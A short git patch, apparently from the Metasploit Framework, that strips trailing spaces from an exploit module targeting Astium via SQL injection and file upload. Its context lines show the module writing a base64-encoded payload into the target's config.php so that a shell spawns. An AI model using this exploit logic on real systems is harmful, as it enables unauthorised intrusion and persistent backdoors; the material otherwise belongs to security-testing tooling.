From fcba42430838c9f40869e847b1058ed2834074b6 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Thu, 3 Oct 2013 11:01:27 -0500 Subject: [PATCH] Kill off EOL spaces on astium_sqli_upload. --- modules/exploits/linux/http/astium_sqli_upload.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/exploits/linux/http/astium_sqli_upload.rb b/modules/exploits/linux/http/astium_sqli_upload.rb index 7680e51546..0319e37bc7 100644 --- a/modules/exploits/linux/http/astium_sqli_upload.rb +++ b/modules/exploits/linux/http/astium_sqli_upload.rb @@ -138,7 +138,7 @@ class Metasploit3 < Msf::Exploit::Remote phppayload << "$orig = file_get_contents('/usr/local/astium/web/php/config.php');" # Add the payload to the end of "/usr/local/astium/web/php/config.php". Also do a check if we are root, # else during the config reload it might happen that an extra shell is spawned as the apache user. - phppayload << "$replacement = base64_decode(\"#{Rex::Text.encode_base64(payload.encoded)}\");" + phppayload << "$replacement = base64_decode(\"#{Rex::Text.encode_base64(payload.encoded)}\");" phppayload << "$f = fopen('/usr/local/astium/web/php/config.php', 'w');" phppayload << "fwrite($f, $orig . \"\");" phppayload << "fclose($f);" @@ -182,7 +182,7 @@ class Metasploit3 < Msf::Exploit::Remote }, 120) # If we don't get a 200 when we request our malicious payload, we suspect - # we don't have a shell, either. + # we don't have a shell, either. if res and res.code != 200 print_error("#{peer} - Unexpected response...") end